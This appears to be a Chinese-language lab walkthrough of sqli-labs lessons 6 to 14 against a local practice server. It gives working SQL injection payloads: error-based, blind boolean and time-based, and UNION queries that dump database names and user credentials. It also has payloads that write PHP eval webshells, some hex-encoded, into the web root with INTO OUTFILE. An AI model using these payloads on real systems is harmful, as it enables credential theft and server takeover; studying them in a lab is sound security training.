Less-6

验证注入点：双引号报错，两个双引号闭合利用闭合方式：" <payload> --+
就闭合方式和 Less-5 不一样外，其余都一样
1.进入第六题，显示Please input the ID as parameter with numeric value，告诉了我们参数为id
Pasted image 20250313192901
发现闭合方式为"，和上一关同理采用报错注入，这里用extractvalue函数

1

http://localhost/sqli-labs/Less-6/?id=1"

Pasted image 20250314110439

1

?id=1" and extractvalue(1,concat(0x7e,(select concat(username,':',password) from users limit 0,1)))--+

Pasted image 20250314110536

Less-7

验证注入点：单引号报错，两个单引号闭合利用闭合方式：')) <payload> --+

1

http://localhost/sqli-labs/Less-7/?id=1

Pasted image 20250314110703
前置知识:
文件读写注入条件：
在配置文件中设置
secure_file_priv=’’

1
2
3


注：
1. Windows的配置文件在mysql下的my.ini
2. Linux的配置文件在/etc/conf

查看是否配置成功：

1

show global variables like '%secure%';

Pasted image 20250314113015
php的配置文件php.ini关闭魔术引号

magic_quotes_gpc = Off
知道服务器的绝对路径
登录的账户具有root权限
读取文件：
load_file()

1

例：select load_file("D:/password.txt") # 读取D盘下的password.txt文件

写文件：
into outfile 路径
实战
1.判断闭合方式闭合方式
利用报错信息判断闭合方式为’))

1

http://localhost/sqli-labs/Less-7/?id=1 ')) --+

Pasted image 20250314111716
利用文件读写注入写入木马：
写入一句话木马：

1
2
3
4


正常Payload:<?php eval($_POST['pwd']);?>
十六进制：0x3c3f706870206576616c28245f504f53545b27707764275d293b3f3e

http://localhost/sqli-labs/Less-7/?id=-1')) UNION SELECT 1,2,0x3c3f706870206576616c28245f504f53545b27707764275d293b3f3e into outfile 'C:\\phpstudy_pro\\WWW\\hack.php' --+

连接地址：http://localhost/hack.php
连接密码：pwd
Pasted image 20250314132112

Less-8

‘闭合布尔盲注
使用的注入语句和第五关的布尔盲注一样
示例，判断长度：

1

http://localhost/sqli-labs/Less-8/?id=1'and length((select database()))>7 --+

Pasted image 20250317132316
写shell：

1

http://localhost/sqli-labs/Less-8/?id=-1' UNION SELECT 1,2,0x3c3f706870206576616c28245f504f53545b27707764275d293b3f3e into outfile 'C:\\phpstudy_pro\\WWW\\hack.php' --+

Pasted image 20250317132457
链接成功。
Pasted image 20250317132622

Less-9

基于GET单引号基于时间盲注
如果当前数据库名字符长度大于1，则执行sleep函数使数据库执行延迟，否则则返回1。

1
2


http://localhost/sqli-labs/Less-9/?id=1' and if(length(database())>1,sleep(5),1) --+
延迟5秒

Pasted image 20250317140308

Less-10

基于GET双引号基于时间盲注
与第9关差不多，只不过闭合方式变成双引号了

1
2


http://localhost/sqli-labs/Less-10/?id=1" and if(length(database())>1,sleep(5),1) --+
延迟5秒

Pasted image 20250317140607

Less-11

基于单引号的POST注入
单引号测试：

1

uname=admin' and 1=1 --+ &passwd=&submit=Submit

Pasted image 20250317144342
字段个数：

1
2
3


uname=admin' order by 3 %23 &passwd=&submit=Submit  //报错
uname=admin' order by 2 %23 &passwd=&submit=Submit  //正常
说明有两个字段

Pasted image 20250317144707
查找回显位：

1

uname=-admin' union select 1,2 %23 &passwd=&submit=Submit

Pasted image 20250317145213
爆库名：

1

uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() %23 &passwd=&submit=Submit

Pasted image 20250317145013
爆表名：

1

uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() %23 &passwd=&submit=Submit

Pasted image 20250317145312
爆列名：

1

uname=-admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='emails' %23 &passwd=&submit=Submit

Pasted image 20250317145416
爆信息：

1

uname=-admin' union select 1,group_concat(concat_ws('-',id,email_id)) from emails %23 &passwd=&submit=Submit

Pasted image 20250317145535
写shell：

1

uname=-admin' UNION SELECT 1,'<?php @eval($_POST["v"]);?>' into outfile "D:\\phpStudy_pro\\WWW\\hack1.php" %23 &passwd=&submit=Submit

Pasted image 20250317145849
成功连接
Pasted image 20250317145917

Less-12

跟11关差不多，但是使用的是双引号加括号进行闭合。

1

uname=admin") order by 2 --+&passwd=&submit=Submit

Pasted image 20250317151040
然后后面跟11关一样。

Less-13

基于单引号加括号进行闭合，错误回显注入。和十二关一样。
构建payload:

1

uname=admin'&passwd=pass&submit=Submit

Pasted image 20250324141135

1

从返回结果（sql语法问题）可见本关的闭合是')

使用

1
2
3


uname=admin') order by 2 --+&passwd=pass&submit=Submit
uname=admin') order by 3 --+&passwd=pass&submit=Submit
进行测试，发现可知查询结果有两列

Pasted image 20250324141332
Pasted image 20250324141349
使用union进行查询，发现没有回显。

1

uname=admin') union select 1,2 --+&passwd=pass&submit=Submit

Pasted image 20250324141550
看来这关要用报错注入了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


#获取服务器上所有数据库的名称
uname=ele') and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele') and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),32,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele') and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),63,31),0x7e),1)#&passwd=pass&submit=Submit
#获取pikachu数据库的所有表名称
uname=ele') and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),1,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele') and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),32,31),0x7e),1)#&passwd=pass&submit=Submit
#获取pikachu数据库users表的所有列名称
uname=ele') and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users'),1,31),0x7e),1)#&passwd=pass&submit=Submit
#获取pikachu数据库users表的username和password列的所有值
uname=ele') and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from pikachu.users),1,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele') and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from pikachu.users),32,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele') and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from pikachu.users),63,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele') and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from pikachu.users),94,31),0x7e),1)#&passwd=pass&submit=Submit

写webshell的payload:

1

uname=ele') or 1=1 limit 0,1 into outfile 'C:/less13.php' lines terminated by 0x3c3f7068702061737365727428245f504f53545b6c65737331335d293b3f3e#&passwd=pass&submit=Submit

Pasted image 20250324141817

Less-14

这关回显sql语法错误，并且闭合是"
测试

1

uname=admin"&passwd=pass&submit=Submit

Pasted image 20250324142325
和上一关一样，这关如果sql查询有值也不显示，所以还是用报错注入，图就不截了，和上一关差不多，跨库爆数据的所有payload如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


#获取服务器上所有数据库的名称
uname=ele" and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele" and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),32,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele" and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),63,31),0x7e),1)#&passwd=pass&submit=Submit
#获取pikachu数据库的所有表名称
uname=ele" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),1,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),32,31),0x7e),1)#&passwd=pass&submit=Submit
#获取pikachu数据库users表的所有列名称
uname=ele" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users'),1,31),0x7e),1)#&passwd=pass&submit=Submit
#获取pikachu数据库users表的username和password列的所有值
uname=ele" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from pikachu.users),1,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from pikachu.users),32,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from pikachu.users),63,31),0x7e),1)#&passwd=pass&submit=Submit
uname=ele" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from pikachu.users),94,31),0x7e),1)#&passwd=pass&submit=Submit

写webshell的payload：

1

uname=ele" or 1=1 limit 0,1 into outfile 'C:/less14.php' lines terminated by 0x3C3F7068702061737365727428245F504F53545B6C65737331345D293B3F3E#&passwd=pass&submit=Submit

本关代码与上一关的区别也仅在于闭合不同了。